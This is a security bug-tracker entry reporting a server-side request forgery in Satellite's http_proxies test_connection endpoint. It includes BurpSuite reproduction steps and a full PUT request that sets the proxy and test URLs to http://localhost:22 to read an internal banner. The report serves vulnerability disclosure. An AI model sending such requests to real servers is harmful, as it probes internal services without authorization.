Bug 2333494

Summary: http proxies: Satellite: Service side request forgery in http proxies
Product: [Other] Security Response Reporter: OSIDB Bzimport <bzimport>
Component: vulnerabilityAssignee: Product Security DevOps Team <prodsec-dev>
Status: NEW --- QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: anthomas, ehelms, ggainey, hlawatschek, juwatts, mhulan, nmoumoul, osousa, pcreech, rchan, smallamp
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: ---
Doc Text:
A server-side request forgery exists in Satellite. When a PUT HTTP request is made to /http_proxies/test_connection, when supplied with the http_proxies variable set to localhost, the attacker can fetch the localhost banner.
 Story Points: ---
Clone Of: Environment:
Last Closed: Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description OSIDB Bzimport 2024-12-20 12:24:51 UTC 
ssrf in https://vulnerableserver.com/http_proxies/test_connection
Affected parameters:
http_proxy[url]
test_ur

• Fill the values and Capture the request with BurpSuite
• In the Repeater tab change the parameter values http_proxy[url] and/or test_url for: http://localhost:22
By default the SSH (22) port is not open:
HTTP Request:
PUT /http_proxies/test_connection HTTP/2
Host: vulnerableserver.com
Cookie: timezone=Europe%2FAmsterdam; _session_id=70c6c0638ec6aad4bd733570fd807267
Content-Length: 381
Sec-Ch-Ua-Platform: "Windows"
X-Csrf-Token: DQmNtiYbhAdFABfamR7mZy7WhruFtY2jjAWrtRPGu5PqmaJwrsCB9Y7hqQZmsCaqNv1VN2aDsxeBBSsgpA478g
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71
Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://vulnerableserver.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerableserver.com/http_proxies/new
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
authenticity_token=DQmNtiYbhAdFABfamR7mZy7WhruFtY2jjAWrtRPGu5PqmaJwrsCB9Y7hqQZmsCaqNv1VN2aDsxeBBSsgpA478g&http_proxy%5B
name%5D=test&http_proxy%5Burl%5D=http://localhost:22&http_proxy%5Busername%5D=&fakepassword=&http_proxy%5Bcacert%5D=&te
st_url=http://localhost:22&http_proxy%5Blocation_ids%5D%5B%5D=&http_proxy%5Borganization_ids%5D%5B%5D=&http_proxy%5Borg
anization_ids%5D%5B%5D=1